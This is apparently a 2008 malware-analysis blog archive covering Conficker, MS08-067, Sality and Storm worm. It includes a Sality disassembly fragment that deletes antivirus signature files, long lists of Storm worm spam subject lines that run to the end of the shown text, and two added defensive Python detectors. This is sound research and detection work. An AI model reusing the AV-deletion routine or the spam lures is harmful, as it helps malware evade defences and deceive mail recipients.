Wednesday, December 31, 2008

Conficker ....

A picture speaks a thousand words ...

Monday, December 29, 2008

Reminder ...

Just read this part in one of the SDKs I got ...


6. Reverse Engineering. You will not reverse engineer, decompile, disassemble or otherwise attempt to discover the source code of any SDK Component provided to you in compiled or object code format except to the extent you may be expressly permitted to decompile under applicable law.


nuninuninuninuninuninuninuninu ...

Monday, December 1, 2008

Ruxcon 2008

Presentations that I liked ...

Attacking Rich Internet Applications - Kuza55, Stefano Di Paola Uninitialized Variables <- I just wish they gave more hours for this talk (maybe removed the next presentation and continued with Paul Ducklin's presentation hehe ... IMO)
JavaScript is Harder than you Think - Paul Ducklin <-hands up
GPU Powered Malware - Daniel Reynaud <- interesting one, noteworthy
Finding, Exploiting, Automating - Daniel Hodson
Targetted OLE2 Attacks, The New Black - Peter Taylor <- my wife liked the presentation so it's worth mentioning
Browser Rider: Your way to Fun Browsing - Nik Mijatovic, Ben Mosse
Browser Memory Protection Bypasses in Vista - Mark Dowd <- as expected, great talk

This one deserves a distinction from the topics above; it was the best one for me and for some guys I know.
Netscreen of the Dead: Developing A Trojaned Firmware for Juniper Netscreen Appliances - Graeme Neilson

Thursday, November 6, 2008

Win32/MS08-067!exploit payload

Nothing much to say ....
Just an image of the decrypted payload ...

Basically, the APIs are for downloading and executing the downloaded file.

Now some packet-talk ...

Make sure your systems are patched to prevent infection by this malware.

Wednesday, October 29, 2008

So Fake ....

I found this one in one of the binaries of Win32/FakeAlert ... as the name says fake alert ...

Monday, September 29, 2008

Install ActiveX controls to repair your computer ?!?!?!

A picture tells a thousand stories ... but this one only tells one thing ...

Don't be fooled by the deceiving behavior of this rogue software ... Vista Antivirus 2008.

Wednesday, September 24, 2008

Sality ....

List of predefined security files that it deletes ...

Well, aside from the *.vdb and *.avc signature files ...

  • A2GUARD.

0103B94E CALL DWORD PTR DS:[105316C] ; kernel32.FindNextFileA
0103B956 JE 0103BA22
0103B962 MOV BYTE PTR SS:[EBP+EDX-548],0
0103B970 PUSH EAX
0103B977 PUSH ECX
0103B978 CALL DWORD PTR DS:[1053160] ; kernel32.lstrcatA
0103B984 PUSH EDX
0103B985 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B98B SUB EAX,4
0103B997 PUSH EAX
0103B998 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B99E CMP EAX,4
0103B9A1 JLE SHORT 0103B9D0
0103B9A3 MOV ECX,DWORD PTR DS:[1054188]
0103B9B5 CALL DWORD PTR DS:[10530B4] ; kernel32.lstrcmpiA
0103B9BD JNZ SHORT 0103B9D0
0103B9BF PUSH 1
0103B9C8 CALL 0103B79C


0103B7A3 JNZ SHORT 0103B7BD
0103B7A5 PUSH 0
0103B7A7 PUSH 2
0103B7AD CALL 0103CAC0
0103B7B2 ADD ESP,0C
0103B7B7 JNZ SHORT 0103B7BB
0103B7B9 JMP SHORT 0103B7D7
0103B7BB JMP SHORT 0103B7D3
0103B7BD PUSH 20
0103B7C3 CALL DWORD PTR DS:[1053080] ; kernel32.SetFileAttributesA
0103B7CD CALL DWORD PTR DS:[105307C] ; kernel32.DeleteFileA
0103B7D5 JMP SHORT 0103B7D9
0103B7D7 JMP SHORT 0103B7BD
0103B7D9 POP EBP
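
The listing walks a directory (FindNextFileA), compares the tail of each name case-insensitively (lstrlenA, lstrcmpiA) and then calls SetFileAttributesA and DeleteFileA. As an added example that is not part of the original post, here is one way to spot that pattern in file-delete telemetry. The field names follow Sysmon FileDelete records; the sample events, paths, allow-list, window and threshold are constructed assumptions.

```python
"""Added example: flag bulk deletion of AV signature files in file-delete telemetry."""
import json
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# From the post: *.vdb and *.avc signature files, plus a predefined list of
# security file names of which the post shows "A2GUARD.".
SIGNATURE_EXTENSIONS = {".vdb", ".avc"}
SECURITY_NAME_PREFIXES = ("a2guard.",)

# Assumption: processes that legitimately remove signature files (hypothetical path).
EXPECTED_DELETERS = {r"c:\program files\exampleav\updater.exe"}

WINDOW = timedelta(seconds=60)   # assumption: burst window
THRESHOLD = 3                    # assumption: deletions per window that raise an alert

# Constructed sample events, one JSON object per line. The suffix after
# "A2GUARD." is made up; the post's entry is just "A2GUARD.".
SAMPLE_EVENTS = r"""
{"UtcTime": "2008-09-24T10:00:01", "Image": "C:\\Temp\\sample.exe", "TargetFilename": "C:\\Program Files\\ExampleAV\\bases\\base001.avc"}
{"UtcTime": "2008-09-24T10:00:02", "Image": "C:\\Temp\\sample.exe", "TargetFilename": "C:\\Program Files\\ExampleAV\\bases\\BASE002.AVC"}
{"UtcTime": "2008-09-24T10:00:03", "Image": "C:\\Temp\\sample.exe", "TargetFilename": "C:\\Program Files\\OtherAV\\main.vdb"}
{"UtcTime": "2008-09-24T10:00:04", "Image": "C:\\Temp\\sample.exe", "TargetFilename": "C:\\Program Files\\OtherAV\\A2GUARD.tmp"}
{"UtcTime": "2008-09-24T10:00:05", "Image": "C:\\Temp\\sample.exe", "TargetFilename": "C:\\Temp\\notes.txt"}
{"UtcTime": "2008-09-24T10:30:00", "Image": "C:\\Program Files\\ExampleAV\\updater.exe", "TargetFilename": "C:\\Program Files\\ExampleAV\\bases\\old1.avc"}
{"UtcTime": "2008-09-24T10:30:01", "Image": "C:\\Program Files\\ExampleAV\\updater.exe", "TargetFilename": "C:\\Program Files\\ExampleAV\\bases\\old2.avc"}
{"UtcTime": "2008-09-24T10:30:02", "Image": "C:\\Program Files\\ExampleAV\\updater.exe", "TargetFilename": "C:\\Program Files\\ExampleAV\\bases\\old3.avc"}
{"UtcTime": "2008-09-24T11:00:00", "Image": "C:\\WINDOWS\\explorer.exe", "TargetFilename": "C:\\Backup\\copy.vdb"}
"""


def is_security_file(path):
    """True if the file name matches the extensions or name prefixes above.

    The listing compares with lstrcmpiA, so the match here is case-insensitive too.
    """
    name = ntpath.basename(path).lower()
    ext = ntpath.splitext(name)[1]
    return ext in SIGNATURE_EXTENSIONS or name.startswith(SECURITY_NAME_PREFIXES)


def parse_events(text):
    """Yield (time, lower-cased image path, target path) from JSON lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        yield (datetime.fromisoformat(rec["UtcTime"]),
               rec["Image"].lower(),
               rec["TargetFilename"])


def detect(text, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per process that deletes >= threshold security files in a window."""
    hits = defaultdict(list)
    for when, image, target in parse_events(text):
        if image in EXPECTED_DELETERS or not is_security_file(target):
            continue
        hits[image].append((when, target))

    alerts = []
    for image, events in hits.items():
        events.sort()
        start, best = 0, (0, 0, 0)          # best = (count, first index, last index)
        for end in range(len(events)):
            # Slide the left edge until the span fits inside the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        count, first, last = best
        if count >= threshold:
            alerts.append({
                "image": image,
                "count": count,
                "first": events[first][0].isoformat(),
                "files": [target for _, target in events[first:last + 1]],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["image"], alert["count"], alert["first"])
        for path in alert["files"]:
            print("   ", path)
```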


Thursday, September 18, 2008


My reference ....

w0sacerqippat...3 - 010049c0
rhuxnodalil03125...4 - 01001ab5


Wednesday, September 10, 2008

Spam email template used by not so famous variants of Storm worm

Here is a list of subjects and contents that I found while analyzing current, not-so-famous variants of the Storm worm, also known as Peacomm (Symantec), Nuwar (Trend Micro & McAfee), Zhelatin (Kaspersky), and Sintun / Pecoan (CA).

These can appear in the subject or the content, so please be aware of unexpected emails you receive with the following subjects:

> Stock Market related spam mails <

#1 Pick of the week
Another celebration
Breakout news
Did you get in today?
Diverse operations bring great things
Don't wast time, this is the opportunity
Dont let the price decieve you
Emerging markets
Everything is looking great
Get it on your watch list
Get the edge on the next stock
Get with the best pick
Great increases
Great news from the floor
I know you want it
Immediate attention needed
Important market tip
Look at the news and the charts
Make the move now
Make your money
Move on it now
News is out
News when you need it
Now is the time
Number one pick of the week
Our subscribers are the first we tell
Our top recommendation
Posted today
Price continues to climb
Rare investment opportunity
Read the profile
Read up on this before Monday
Right Now, go look
Set your bid now
Shares continue to increase
Stock Information
Stock News
Stock Watch Information
Stocks that are moving
Take advantage of this one
This is a winner
This requires your attention
Timely information
Watch it trade
We are so excited
We wanted to share with you
Why it should be in your portfolio
You can do it
You know what to do
You need this
[re:] good company
buy low sell high
do you want to double your money
don't wait read it now
make it a great week
market watch
still on top
take a look at this
the best buy is now
they are still adding on

> E-Card related spam mails <

A Digital Card from someone who cares.
A card for you
A greeting for you
A greeting from ...
An Ecard for someone special
Greetings from...?
Here is Your Ecard
Here is your E-greeting
Open now for your eCard
Someone Made you a card
Someone is thinking about you.
Someone sent you an Ecard
Someone sent you an Ecard.
This is a Card for you.
This is for you.
You Have An Ecard
You have a new eCard from...?
You have a new greeting
You have an E-Card from...?
You have received an eCard
You've received an E-Greeting
Your Digital Greeting Card is waiting
If you want to see your Ecard,
If you would like to read this greeting,
If you would like to see your Card,
To Enjoy your Ecard,
To get your Ecard,
To get your message,
To recieve your greeting,
To see your card,
To view your Ecard online,
To view your card,
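
A mail-triage check built from a few of the stock and e-card phrases listed above, as an added example that is not part of the original post. It matches the subject after normalising case, reply prefixes and trailing punctuation, and checks body lines against the comma-terminated phrases. Treating entries that contain "..." as prefixes and the comma-terminated entries as body openers is an assumption, and the sample messages are constructed.

```python
"""Added example: match mail against Storm subject/body phrases from the post."""
import re
from email import message_from_string, policy

# A few phrases copied from the lists in the post; load the full lists in practice.
SUBJECTS = {
    "stock": ["#1 Pick of the week", "Breakout news", "Did you get in today?",
              "[re:] good company"],
    "ecard": ["You have received an eCard", "Someone sent you an Ecard.",
              "A greeting from ..."],
}
# Assumption: list entries ending in a comma are opening phrases of the body.
BODY_OPENERS = {"ecard": ["If you want to see your Ecard,", "To view your Ecard online,"]}

# Constructed sample messages.
MSG_ECARD = ("Subject: RE: YOU HAVE RECEIVED AN ECARD!!\n\n"
             "To view your ecard online, follow the link you were sent.\n")
MSG_ENCODED = "Subject: =?utf-8?q?Breakout_news?=\n\nhello\n"
MSG_TEMPLATE = "Subject: A greeting from Alice\n\nhi\n"
MSG_CLEAN = "Subject: Lunch on Friday?\n\nSee you at noon.\n"


def normalize(text):
    """Case-fold, collapse whitespace, drop Re:/Fw: prefixes and trailing punctuation."""
    text = re.sub(r"\s+", " ", text).strip().casefold()
    text = re.sub(r"^(?:(?:re|fw|fwd)\s*:\s*)+", "", text)
    return text.rstrip(" .!?")


def build_rules(subjects):
    """Split phrases into exact matches and prefix matches (entries containing '...')."""
    exact, prefixes = {}, []
    for category, phrases in subjects.items():
        for phrase in phrases:
            if "..." in phrase:
                # Assumption: "..." marks where a sender name is filled in.
                prefixes.append((normalize(phrase.split("...")[0]), category, phrase))
            else:
                exact[normalize(phrase)] = (category, phrase)
    return exact, prefixes


EXACT, PREFIXES = build_rules(SUBJECTS)


def classify(raw_message):
    """Return a list of (where, category, matched phrase) hits for one raw message."""
    msg = message_from_string(raw_message, policy=policy.default)
    hits = []

    # policy.default decodes RFC 2047 encoded-word subjects for us.
    subject = normalize(str(msg["Subject"] or ""))
    if subject in EXACT:
        hits.append(("subject",) + EXACT[subject])
    else:
        for prefix, category, phrase in PREFIXES:
            if subject.startswith(prefix):
                hits.append(("subject", category, phrase))
                break

    part = msg.get_body(preferencelist=("plain",))
    body_lines = [normalize(line) for line in part.get_content().splitlines()] if part else []
    for category, openers in BODY_OPENERS.items():
        for opener in openers:
            if any(line.startswith(normalize(opener)) for line in body_lines):
                hits.append(("body", category, opener))
    return hits


if __name__ == "__main__":
    for raw in (MSG_ECARD, MSG_ENCODED, MSG_TEMPLATE, MSG_CLEAN):
        print(classify(raw))
```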

> Spam promoting an online pharmacy <

1 month-1 inch
1 week - 2 kilos off
10 Mistakes All Men Make!
10 ancient secrets of perfect intimate life.
10 mistakes every man makes.
10 most common reasons for failures in bed.
10 reasons to cure ED as soon as possible.
10 reasons to take enhancing medicaments.
10 reasons why you need tocureED as soon as you can.
10 secrets of better xxxlife!
10 secrets why online chemists are so cheap.
10 simple tricks to become more perfect
10 things to do to enhance your personal life.
10 things to do to your lover.
10 things to tell a naked woman!
10 things to tell a naked woman!
10 ways to act in bed longer!
10 ways to act in bed longer!
10 ways to control your desire!
10 ways to free her desire.
10 ways to make your lover happier.
10 ways to release your male power
100% Safe To Take, With NO Side. Helps your intimate life.
12 more inches aint so bad, dont you think so?
15 Mistakes Every woman made!
15 Steps For Better Love Life
15 Ways to act Longer in bed!
15 Ways to act Longer in bed!
15 ways to make her finish!
15 ways to make your xxx-life much better!
2000 health products to choose from.
22 Things You Can Do To Satisfy Your Gf
27 Natural Ways to Boost Your Love Drive.
3 month supply of better intimate life is waiting for you
3 month supply of pleasure in bed.
3 month supply to forget about failures in bed.
3 month supply to loose 3 kilos a week.
3 months supply of perfect intimate life.
3 simple ways to make any night unforgetable.
3 ways to start a new intimate life full of pleasure
3 ways to start a new intimate life full of pleasure and delight.
3 ways to start a new xxxlife.
3 ways to turn any woman to a fountain of response and desire.
3'' enlargement is no longer a myth.
36-hour cure for perfect night with your gf.
365 Ways to Enhacne Your Love Life
36hours boner, thats impressive!
4 ancient greek secrets of rich intimate life
4 ancient greek secrets of rich intimate life.
4 times cheaper than any other local chemist. Online Canadian Chemist.
5 ancient egypt secrets of perfect intimate life have been discovered.
5 meds every woman needs.
5 reason why men cannot satisfy women.
5 tricks to be more perfect.
5 ways to make your love more passinnate
5 ways to make your love more passionate.
5 ways to safeguard intimate sex life.
6 month-pack for best results and huge savings!
6 month-pack for best results and huge savings!
7 reasons why most men cant satisfy their women.
7 things to buy for your lover.
8 thmgs every woman makes in her intimate life.
9 Things You Can Do Right Now To Boost Your Happiness
90% of mentake this and feel happy.
A better way to give up smoking.
A health portal which gives you an insight about your physical wellbeing.
A key to your success in bed.
A magic pilule to make your lady happy.
A simple way to increase your conrolthat you can use tonight.
A small thing that makes your lady happy.
A small thing to make your woman happy.
A solution to your failures in bed.
A solution to your failures in bed.
A wide selection of most popular goods for health online.
ANTI-ED solution know from the ancent times!
Add more Pleasure to Your Intimate Life.
Add more fire into your intimate relationship.
Add more fire to your relations.
Add more passion to your relations.
Affordable and easy male and female enhancing.
After crazy night she will wanna be with you always.
Agree to be sick! Noway!
Agree to be sick! Noway!
All answers to male improvement questions.
All answers to potence improving questions.
All answers to questions about your state.
All girls around will be yours.
All guys need this
All guys take this.
All men do it.
All special meds for your most loved ones.
All that she is dreaming about during long nights.
All that she is dreaming about during long nights.
All that she is dreaming about.
All the hottest ladies on the beach will be yours.
All weapons for battle against diseases!
All weapons for battle against diseases!
All you need is a blue pilule.
Amazing growth within just one short month!
Amazing growth within just one short month!
America's online chemist serving your needs for health products, health information and pets care services.
American best lover is YOU.
Ancient greeks used this to treat their male problems.
Ancient secret for perfect intimate life.
Ancient secret of treatment bad condition.
And you will know what the true love is.
Are you ready to boost your self-esteem and start feeling great life?
Are you ready? she is!
Are you ready? she is!
Ask us how to enhance your relations with gf?
Ask us what is the secret of xxxmovie starts and we will answer your question.
Bad health report? Consult us.
Be beloved by her tonight.
Be better satisfied with your xxxlife.
Be careful. Dont put your healthat stake, we carry everything for your health.
Be extremely careful, chosing antiED cure method.
Be happy!Be really healthy!
Be happy!Be really healthy!
Be healthy at low cost.
Be her owner in bed.
Be her winner tonight.
Be nominated for the best lover of the year with our brand new enhancer.
Be smarter, get your medicaments online.
Be the ladies' hearts ruller!
Be the master of lovemaking art.
Be the only macho man around.
Be the stud in 2008!
Be the stud in 2008!
Be the winner every night with magic pilules.
Be the world best lover.
Be too hot and she wont resist.
Be too hot to resist!
Be too hot to resist.
Beach season is near, ensure your potence on vacation.
Become ED-resistant MAN.
Become a new man.
Become women's idol.
Best doctors recommend this.
Best health products at low cost.
Best intimate life enhancer.
Best of the best products for your health are here.
Best of the best products for your health.
Best places to get medications online, best strategies to save.
Best prices for best intimate living.
Best prices for licensed cures on the internet.
Best prices to cure ED.
Best solution, if you need products for health.
Best way to giveyour love a boost.
Better intimate enhancer that is cheaper and more faster than any other on the market
Better living through Canadian chemists.
Better living through Canadian chemists.
Better xlife, better fun.
Bigger, harder, longer lasting
Blue colouerd-tab at your service all nights long!
Blue pill will make you as hard as stone and you will act longer!
Blue pilule works, you win.
Blue pilule, when you do not need control your desire.
Blue pilule. Because sometimes she wants to play.
Blue pilule. Because sometimes she wants to play.
Bluepill will help you have a lifetilong fiesta with your chixs!
Bluepill will make you the best pornstar!
Bluepill will make your hard stone even harder!
Bluepill will restore your happiness tonight and evey night!
Boost a growth of your intimate part!
Boost your acting in bed.
Boost your action in bed
Boost your action in bed.
Brake all records in love marathon.
Breakthrough in male enhancing.
Breathe a new life into your intimate life.
Bright and joyful intimate life.
Bring joy and pleasure to her life.
Bring joy to het life with antiEDs
Bring more fun to your xxxlife!
Bring more happines into your night life.
Bring more joy to your life, get a bluepill!
Bring more joy, happiness and pleasure to your night life.
Bring more pleasure to your xlife!
Bring passion and desir back to your life.
CHANGE your night life in five minutes.
Calabrate a victory in intimate life.
Can your health problems be solved within a month? Yes, they can.
Can your male problems be cured with a pilule?
Can your male problems be cured with a pilule?
Canadian Chemists-best solution for your health needs.
Canadian doctors we trust.
Canadina chemist - best solution to all your health problems.
Canadina chemists help you save 90% on medical bills.
Canaina health shop is found to be good for you.
Cant act better in bed?
Cant find a good e-chemists? Check this out.
Cant find a good online chemists? Check this.
Casanova style of life.
Celebrate independence day with a hard boner.
Celebrate your victory in love.
Change your condition for better.
Change your nightlife for better.
Check for most attractive prices for meds!
Check for most attractive prices for meds!
Check this potence ensurer, its great, mate.
Claim for freee bluepills!
Come closer to healthy and more passionate intimate life.
Complimentary health supply at Canadian Chemist.
Contact us to order and any other health products online.
Cut your expences on mdes!
Cut your expenses on medication, buying from Canada.
Cut your payments on medications.
Cutting cost on 2000 medications..
DO NOT leave her unsatisfied.
Daily new products at our chemists
Dear patient, we would like to advice you Canadian Chemis for all your health needs.
Deeper penetrator!
Disappointed with your bad performance in bed?
Discover online Canadian Chemists
Discover your online health consultant.
Do not let illnesses exist in your life.
Do not let illnesses exist in your life.
Do not let the desease spoil your life!
Do not let them mock at small weener!
Do not let them mock at small weener!
Do not play with your fortune, keep some blue colored-tabs with you!
Do with you gf what millions of man do everyday.
Do you care about her enjoyment
Do you care about her satisfaction.
Do you feel depending on your doctor?
Do you know that using on line chemists is more safe and convenient?
Do you know what she is dreaming about during long nights.
Do you like wild nights?
Do you think that your health is at risk?
Docs approve and recommend online Canadian Chemist.
Doctor's recommended soluion for most intimate male problems.
Doctors recommended source for good health products.
Don't be last to know that Canadian Chemists is offering you all health products you may need.
Donation for your intimate life.
Dont allow intimate problems destroy your life, we have the solution for you.
Dont be left behind because of bad health.
Dont be the last to know about Canadian chemists.
Dont blame your doctor for not telling you about us.
Dont forget your enhancers, when going to the party.
Dont get lost in her eyes because of small dimensions.
Dont give up on loosing hair. You can stop it right today.
Dont hesitate if shee needs your response right now.
Dont know how to please her every night? Ask us how.
Dont let excess weight spoil your life.
Dont let it fall, when you need it up.
Dont let paim and ilness happen in your life.
Dont let sickness spoil your vacation.
Dont let your intimate life turn into disaster.
Dont let your wife be nagry with you because of bad potence.
Dont let your xlife go down due to lack of bluepills, get'em here!
Dont look fat and stupid this summer.
Dont look fat and stupid this summer.
Dont miss a perfect opportunity to get in shape again.
Dont overdose antiEDs, or you can have tonns of pleasure.
Dont play with your x-life, get bluepills with you!
Dont runaway from your male problems, let us solve them.
Dont spoil your efforts to satisfy her.
Dont treat her carelessly
Dont treat your condition carelessly
Dont try your luck in bed, ensure your potence with ANTIEDs.
Dont want to shy your personal life?
Double your pleasure and benefit from world know Canadian Chemist.
Double your pleasure and benefit in bed.
Dr. Smith is recommending.
Dream of being healthier?
Dreaming of rich xxx life?
Drive her crazy tonight.
Drive her wild tonight.
E-store selling full range of health products from UK and US.
Eight Natural Ways to Boost Your Potence.
Enhance your intimate response.
Enhance your possibilities in bed.
Enhance your relations with her.
Enhance your relationships with her.
Enhance yur hot summer nights.
Enjoy The Intimate Life You Deserve
Enjoy feeling and looking in good shape.
Enjoy full bedroom life.
Enjoy intimate life you deserve.
Enjoy the healthy life you can have.
Enjoy the life to the full!
Enjoy your life! And let us take care of your condition.
Enlarge your PE and your mind will follow!
Enoy your wife. Anytime. Anywhere.
Ensure your potence and make love everywhere
Ensure your potence and make love everywhere
Euro best health supplier.
Even Brad Pitt takes blue pilules!
Even doctors get meds from us.
Ever heard of 4 inches enhancing or 2 weeks?
Every 2 men out of 3 need this to maintain normal intimate life.
Every night will be the night of pleasure if you take the right antiED's.
Excelent improving effect.
Excellent effect on your condition.
Excellent effect on your male power.
Excellent improving effect on male health.
Experience more pleasure from perfect intimate living.
Experience the true pleasure
Experience up to 60 minutes prolonged pleasure.
Experince more long and continous pleasure.
Expnd yourself and experience wonderful challenges.
Exposing xxxstars secrets today.
FIghting with illness?
FIghting with illness?
Fast and simple way to drop kilos and gain good health.
Feel all the benefits of magic blue colored-tabs!
Feel the power of youh at any age.
Few simple steps to dominating in bedroom.
Fill in your medication subscription.
Finally your new healthy life.
Finally, a safe, permanant, doctor's approved EDSOLUTION!
Find a personal health assistant now.
Find out how you can change your love life with our wonderpills
Find the lowest prices for online health products.
Find your love stick gain here.
Find your own personal health assistant.
Fine medications to fit your budget.
Five start health products
Five start health products
For better control and improved love life.
For those who are looking perfect enhancers.
For those who think that antieds gonna change nothng.
For those who want to be home xxxstarts.
For those who want to know how to prolong pleasure in bed.
For your sweethearts only.
Forget about ErDys.
Forget about bad intimate experience.
Forget about failures in bedroom for 3 month.
Forget about huge spendings on medication.
Forget your bad experience in love.
GLobal potence ensurer!
Get a magic tool for lady's satisfying.
Get a secret weapon of xxx-stars!
Get an instant cut off.
Get back to slim shape again.
Get equiped to fight against ilnesses.
Get equipped for night love battle.
Get fit for summer beach season.
Get harder, last longer, penetrate deeper.
Get help from medical doctor listing in the United States
Get hot in a while.
Get in shape Fast.
Get it up fast and simply
Get laid with the hottest ladies of the web!
Get ready for wild summer nights.
Get ready to improve your night life.
Get ready to lay right now
Get ready to sleep ith her for 15 mins
Get rid of bad health.
Get rid of bad intimate experience.
Get rid of bad intimate living.
Get the latest news on your health.
Get the most health for your money here.
Get your doctors recipes here.
Get yourself in shape.
Girls will call you Largissimo.
Give her wonderful hours of pleasure.
Give her wonderful hours of pleasure.
Give her your attention every night.
Give you lover new intimate feeling.
Going to the beach do not forget to loose many kilos
Going to the party do not forget intimate enhancers.
Going to the party do not forget to take blue clored-pill with you to ensure your potence!
Good changes for your intimate life.
Good health is what you really need!
Good health is what you really need!
Good potence. Good or bad?
Good solution for all your needs!
Good solution for all your needs!
Gooooood day for all your health needs is today.
Great summer sale of medicaments.
Great variety of health products
Great variety of health products.
Great variety of little helpers for your health.
Great variety of products for your health.
Greater male volume and power enhancing.
Grow bigger in her eyes.
Half a year supply for better enhancing and less cost.
Have all the countermedicines online.
Have all the medicaments at your hand.
Have an unforgetable night with a blue pilule.
Have control over xxxlife again.
Have healthier and longer life.
Have her photo and blue pilule in your pocket.
Have instant access to yourhealth supply.
Have more fun and pleasure in your intimate life.
Have new nights with your wife.
Have perfect health in an imperfect world.
Have yoour own supply of perfect intimate living.
Have you ever dream of covering your needs at one place?
Have you seen this chemists?
Have your ever wondered what to do to your wife after 5 years?
Have your intimate life inspired by a blue pilule.
Have your intimate life inspired by a blue pilule.
Have your personal supply of perfect lovemaking life.
Have your recipes here.
Having trouble keeping your tines straight?
Having trouble keeping your tines straight?
Health care center answering your health questions.
Health life starts from here.
Health life starts from here.
Health of those ones, you love can be at stake.
Health problem solver.
Health problems best solution.
Health recovering solution just for you.
Health security news, your attention is required
Healthy Ways to Male Enhancing
Healthy intimate life is a key to your success.
Healthy life improvement.
Healthy life is not a myth anymore!
Healthy life is not a myth anymore!
Healthy life starts from canadian doctors.
Healthy life? Easy!
Healthy life? Easy!
Healthy news mail.
Help people live longer,happier, healthier!
Helping Americans become happy and healthy
Helping people spend nights happily
Helping you becoma healthy day by day.
Her hidden dream about great nights with you.
Here is the message from your doctor.
Hey, hot man, hot woman is waiting for you.
High quality chemists. Do not miss the chance.
His girlfriend is pleased and yours?
Hoow to live healthier without doctors.
Hot chixs.Ponetnce.Blue-colored-tab.
Hot pornstars secrets revealed. Magic Blue colored-tab!
Hot summer nights will be even hotter.
How To Boost Your Love Life!
How avoid being ripped by doctors.
How different is your loving life?
How have her all night long.
How interesting is your love life?
How make any night unforgetable.
How make pleasure more durable
How make your gf 10 times happier.
How make your gf happy 5 times a day?
How much can you save by purchasing from online chemists?
How much health do you need to be happy?
How please your gf 5 times a day.
How take her all night long.
How to Kick-Start Your Intimate Drive
How to achieve good potence in 30 minutes.
How to be more scilful in bedroom.
How to be more skillful at bed.
How to control your weight.
How to get out of bad health.
How to get rid of bad xlife?
How to get rid of poor intimate life.
How to improve your relationship
How to know if she doesnt like your performance in bed.
How to last longer making love and have more powerful feelings.
How would you like to spend your night with gf?
I hope this will help you solve all problems with health!
I hope this will help you solve all problems with health!
If good health is what you really need, then its time to visit canadian chemists.
If good health is what you really need.
If good potence is what you are dreaming about.
If long dimensions is what you dreamt about.
If she has touched your heart an you want to spend a night with her, ensure your potence.
If she needs your attention everynight.
If she needs your response this night, do not hesitate.
If you are looking for a good way to improve your relationship.
If you are looking gor good health, itstme to visit Canadian Chemists.
If you are the one who needs male enhancing, we have a better solution for you.
If you are thinking about enhancing, check this out.
If you cannot act the way you want, take some blue-coloured pills!
If you cannot satisfy your woman, we will help you.
If you ever wonderedhow porn starts can act so long.
If you feel desperate on returning inimate living.
If you look stupid in bed
If you look stupid in bed
If you need a recipe no need to go to a doctor.
If you need healt products, Canadian chemist is the best solution.
If you need health products, Canadian chemist is the best solution.
If you need to improve your intimate life!
If you need to improve your little friend.
If you need to improve your littly.
If you need to improve your nights.
If you thinking about your potence, visit us.
If you want a decent night, get a magic pilule online
If you want to get bigger, check this site out.
If you wish not to visit doctors any more, read this.
If you wish not to visit doctors any more, read this.
If your health needs fix
If your potence has been compromised.
If your xxx life is not working the way you want it to
Important changes for your love life.
Important-Your Health is at stake.
Impress your Ladies!
Impress your Ladies!
Impressive enhancing results.
Improve your health and well-being.
Improve your health this summer.
Improve your love making art.
Improve your manhood with these wonderful male enhancing products.
Improve your organism state.
In Canadian Chemist we trust.
In questions of health you can rely on us.
Increase your male drive to a level never before thought possible.
Increase your male power.
Inexpensive medications for men and women.
Instant intimate relief
Intimacy and your love life.
Intimate life booster pack
Intimate life booster pack.
Intimate life doping seller.
Intimate stimulation for her.
Introducing you a new online health store.
Invade her.
Invitation to new e-chemist opening.
Is Your Intimare Life All Fireworks or Less Than Explosive?
Is your intimate life buried beneath time gone by, old feelings or even age?
Is your intimate life on the back burner?
Is your love stick as hard as stone?
Is your personal life perfect?
It helps you solve all health problems!
It is high time for you to try our safest, doctor approved enhancing method.
It make shock you, but you will have it up for 36 hours.
It will rise faster and stay up longer.
Its amazing how your bedroom life can change
Its amazing what one little pilule can do.
Its amazing what one little pilule can do.
Its time for perfect enjoyment in bed.
Its time to visit us for good health.
Join the biggest community of man that cured their male intimate problems
Join the biggest community of successful men.
Just do her.
Just for you and your beloved one.
Just you, she and blue pilule will make the night unforgetable.
Keep it up fast and long.
Keep it up fast and simply.
Keep your relations fresh.
Killer discounts on all pilules.
Know what can bring passion and desire into your life.
Largest selection of medication products.
Last all night easily.
Latest news from your doctor.
Leading supplier of Canadian chemists
Leading supplier of Canadian chemists in now available for you.
Leading the intimate revolution.
Learn how and when blue pilule works best for you.
Learn how and when enhancing products work.
Learn how make your GF happy.
Learn how to prolonge your pleasure in bed.
Leave no place for ED in your intimate life.
Leave no place for illness in your life.
Let everyone know about your success in bed.
Let her do everything for you this night.
Let her dream about great nights with you come true tonight.
Let magical changes happen in your night life.
Let us do the work of making you and your gf happy every night.
Let your intimate dreams come true!
Let your intimate wishes come true.
Light her eyes with true desire.
Like our medications, love our pilules.
Limited time offer, get one of three antieds free with every product.
Live life to the fullest.
Living the life of Casanova.
Look what she came across.
Looking for a perfect blue pilule?
Looking for a perfect night? Get a blue pilule.
Looking for better night spendings? Try this and your wife wont leave you tonight.
Looseweight naturally.
Loosing kilos easily.
Loosing kilos fast and safe.
Low cost enhancers for men and women.
Low cost, secure and discrete online chemists.
Low prices for high quality. Medications.
Low-cost, full stock, secure and discreet online chemist store.
Lowest prices for best products!
Luck has no importance in good intimate life.
Luxury health products for your most loved ones.
Make a pleasure more durable.
Make her dream of you avery day and night.
Make her happy and show how you love her.
Make her intimate world beautiful.
Make her long for you every night.
Make her nights special.
Make her scream in pleassure, everynight.
Make her want you everynight.
Make her wildest dreams come true
Make sure all your health orders have been fullfilled
Make sure that she is well satisfied every night.
Make your babymaker stonehard.
Make your gf nights happier.
Make your girls happier.
Make your intimate nights longer
Make your intimate nights longer
Make your love stick as hard as you want it to be.
Make your nights hot.
Make your nights of love as long as never before.
Make your nights of pleasure longer.
Make your own supply of health.
Make your wife happier today.
Make your woman happy and increase potence.
Make yourself healthier.
Making prices for medication products dirt cheap.
Male enhancing is possible, learn how and what works best for you.
Male enhancing products have been reviewed and evaluated.
Male enhancing products review.
Mans tru beauty is in his pants.
Maximize your intimate performance.
Medication prices killing you?
Medications for consumers and medical health professionals.
Medications you've been in need.
Medicine's version of "MIRACLE-GRO."
Megasite for your health needs.
Memorial day sale, 80% off al the prices.
More health with less expenses.
More pleasure for you and your lovers.
More pleasure wit less efforts.
Most famous ichemists in th world.
Most male problems can be treated.
Most reliable source for your medical needs.
Mot of your health coms from good medications.
Much, much bigger than you ave it right now.
Multiple her pleasure.
